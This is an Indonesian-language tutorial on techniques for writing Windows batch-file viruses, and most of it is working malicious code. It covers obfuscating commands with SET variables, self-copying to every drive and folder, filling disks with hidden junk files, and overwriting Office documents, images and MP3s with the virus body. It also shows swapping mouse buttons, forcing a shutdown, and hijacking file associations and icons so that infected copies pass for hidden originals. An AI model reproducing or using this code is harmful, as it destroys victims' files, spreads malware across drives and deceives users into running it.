Teknik-teknik yang biasa digunakan VM [Batch only]

Laporan ini merupakan hasil riset yang dilakukan penulis melalui google, interview dngan VM, dan meliht code virus.

Virus merupakan suatu program yang di ciptakan dengan maksud dan tujuan merusak.
Adapun teknik-teknik yang digunakan seorang VM untuk membuat virus bermacam-macam.

dalam kesempatan kaliini bkal gw ksih tau teknik" yang wajar d pke.



1. Enkripsi kode dengan pnggunaan perintah "SET"

for %%r in (*) do copy %0 "%%r"
rem pakai petik dua karena dos tidak tau nama panjang jadi harus pakai petik dua
ren * *.bat
shutdown -s -t 10 -c "Good Bye" -f

Menjadi:

set f=for
set i=in
set d=do
set ko=copy
set ubah=ren
set a=shu
set b=tdo
set c=wn
set d= -s -t 10

%f% %%r %i% (*) %d% %ko% %0 "%%r"
rem petik dua karena dos tidak tau nama panjang jadi harus pakai petik dua
%ubah% * *.bat
%a%%b%%c% %d% -c "Good Bye" -f

2. Menambahkan karakter/kata tambahan pada sebuah folder misal menambahkan kata “keren” pada setiap folder di “D:\test” (w/o subdir) :

@echo off
set "Dir=D:\test"
cd /D "%Dir%"
for /f "tokens=*" %%a in ('dir "%Dir%" /b /a:D') do (
Ren "%%~fa" "%%~a keren"
)

3. Manipulasi Byte Virus

Menaruh karakter acak agar menambah size virus [Conth tdak d brikan krena trlalu mudah]

4. Menduplikasikan diri

copy %0 "C:\"

digunakan untuk menduplikasi diri ke drive C

for %%a in (A B C D E F G H) do if exist "%%a:" copy %0 "%%a:\virus.bat"
unuk mengkopi ke seluruh drive abcdefgh.


5. Stay di memory

virus bat tsb tidak boleh mencapai baris akhir scriptx.

Contoh :

@echo off
perintah1
perintah2
..
..
:Ulang
Perintah3
perintah4
..
perintah terakhir
goto Ulang

6. mengkopi diri ke dalam setiap folder dengan nama yang sama dengan folder tersebut.

@echo off
REM Mengcopy diri sendiri ke seluruh folder di drive C
For /R "C:\" /D %%a in (*) do copy %0 "%%~fa\%%~nxa.exe"

REM Mengcopy diri sendiri ke seluruh folder di drive D
For /R "D:\" /D %%a in (*) do copy %0 "%%~fa\%%~nxa.exe"

REM Mengcopy diri sendiri ke seluruh folder di Drive lainnya.
For /R "Nama Drive:\" /D %%a in (*) do copy %0 "%%~fa\%%~nxa.exe"

Penjelasannya:

Format perintah “FOR” lazimnya spt ini :

FOR [option] %%variable in (setting) do Perintah/Command

sebenarnya, kalau mau lengkapnya ketik aja “FOR /?” di cmd. disitu penjelasannya lengkap.

# Yang dimaksud dengan “/R” adalah option untuk memberlakukan perintah pada seluruh Folder dan Subfolder (R=Rekursif).

# kalau “%%a”, untuk menyimpan “setting” ke dalam sebuah variabel “%%a”. “a” boleh diganti dengan huruf lain dr a-z dan A-Z (case sensitive). misal : %%b, %%c, dst.

# “Setting” adalah filter. “*” artinya seluruhnya. contoh penggunaan : misal “*” diganti “a*”.


For /R "C:\" /D %%a in (a*) do copy %0 "%%~fa\%%~nxa.exe"

Maka, perintah tsb hanya berlaku untk Folder yang diawali huruf “a”

# truz yg “%%~fa\%%~nxa.exe” artinya spt ini :


f - full path
n - nama file
x - extensi file
a - nama variabel (harus sesuai dgn variabel yg didepannya).

misal : %%a=C:\test folder\readme.txt


%%~fa - nama lenkap variabel %%a (jadi, %%~fa=C:\test folder\readme.txt)
%%~na - nama filenya saja (jadi, %%~na=readme)
%%~xa - ekstensinya saja (jadi, %%~xa=.txt)
%%~nxa- nama beserta ekstensinya (jadi, %%~nxa=readme.txt)

[9] Membuat Junk File, alias menghabiskan free space harddisk.

contoh : misal awalnya freespace drive “c:” 10 GB, setelah virus dijalankan bisa tinggal 10 MB.


setlocal ENABLEDELAYEDEXPANSION
for %%a in (C D E F G H I J) do if exist "%%a:\" (
for /f "tokens=3" %%b in ('dir "%%a:\" ^|find /i "Dir(s)"') do (
for /f "tokens=1-5 delims=," %%k in ("%%b") do (
set pagefile_%%a=%%k%%l%%m%%n
set /a pagefile_%%a-=10000000
)
)
fsutil file createnew "%%a:\pagefiles.sys" !pagefile_%%a! >nul 2>&1
attrib +s +h "%%a:\pagefiles.sys"
)

code diatas akan mengurangi freespace drive : c,d,e,f,g,h,i dan j (bisa diganti). Atau yang simplenya.


MKDIR %Random% %Random% %Random% %Random% %Random%

[10] Menginfeksi Office Document (word, excel, powerpoint)

yang, ini kode berbahaya hati2 menggunakannya. Semua file (*.doc, .xls , .ppt) akan terinfeksi dan hanya bisa direcover dgn antivirus/office document recovery. Teknik ini kurang lebih sama dgn yg digunakan worm brontok, namun dlm versi batch..


@echo off
setlocal ENABLEDELAYEDEXPANSION
..
REM Mencari Folder MyDocument
set "DocReg=HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\DocFolderPaths"
for /f "tokens=1,2,*" %%a in ('REG QUERY "%DocReg%" /v "%username%"') do (
set "DocPath=%%~c"
)
..
REM Mulai Menginfeksi
for /R "%DocPath%" %%d in (*.doc* *.ppt* *.xls* *.jpg *.gif *.psd *.cdr *.mp3) do (
type "%%d">backup.txt
type %0>"%%~fd"
Del /f /q "backup.txt"
)

[11] Buat Swap Mouse


@Echo off
Set KLjnVcGvbG=%0
Set gKfsH=py
Set WerVp=%%a
Del %2\%WerVp%
Del NamaVirus.tmp
RUNDLL32 USER32.DLL,SwapMouseButton

@echo off
setlocal ENABLEDELAYEDEXPANSION

[12] Mengganti icon dengan file yang diinfeksi.


:Start_Infect
for %%a in ("C:\Test\*.*") do (
set "ext=%%~xa"
set "for_check_ext=!ext:~-3!"
IF /i not "!for_check_ext!"=="vir" (
call :Find_Type
copy /y %0 "%%~dpna!ext!vir" && attrib +s +h "%%~fa"
)
)
GOTO :NEXT
:Find_Type
REm Check if Extension already exist
REG Query "HKCR\!ext!vir" >nul 2>&1 && GOTO :EOF
for /f "tokens=1* delims==" %%a in ('assoc !ext!') do (
set "file_type=%%~b"
)
for /f "tokens=1* delims==" %%a in ('assoc !file_type!') do (
set "new_type=%%~b"
)
for /f "tokens=3*" %%a in ('REG QUERY "HKCR\!file_type!\DefaultIcon" ^| find /i "REG_SZ"') do (
set "icon_location=%%~b"
)

:Create
REm Create New Extension
(
ASSOC !ext!vir=vir!ext!
ASSOC vir!ext!=!new_type!
REG ADD "HKCR\vir!ext!"
REG ADD "HKCR\vir!ext!\DefaultIcon"
REG ADD "HKCR\vir!ext!\DefaultIcon" /ve /d "!icon_location!"
REG ADD "HKCR\vir!ext!\Shell"
REG ADD "HKCR\vir!ext!\Shell\Open"
REG ADD "HKCR\vir!ext!\Shell\Open\Command"
REG ADD "HKCR\vir!ext!\Shell\Open\Command" /ve /d "cmd /c type \"%%1\">\"%TEMP%\temp.bat\" && call \"%TEMP%\temp.bat\" && del /f /q \"%TEMP%\temp.bat\""
) >nul 2>&1
GOTO :EOF
:NEXT

- Untuk percobaannya coba buat folder : “C:\Test”

- Terus, dalam folder tersebut isi file bermacam macam (*.doc, *.rar, *.mp3, dll)

- lalu jalankan codenya.

- Liat file yang ada di dalam folder “Test” tsb, yang keliatan adalah virus dan file aslinya di superhidden.

- yang lebih mantapnya lagi nama,icon & type filenya sama persis.., sangat sulit dibedakan.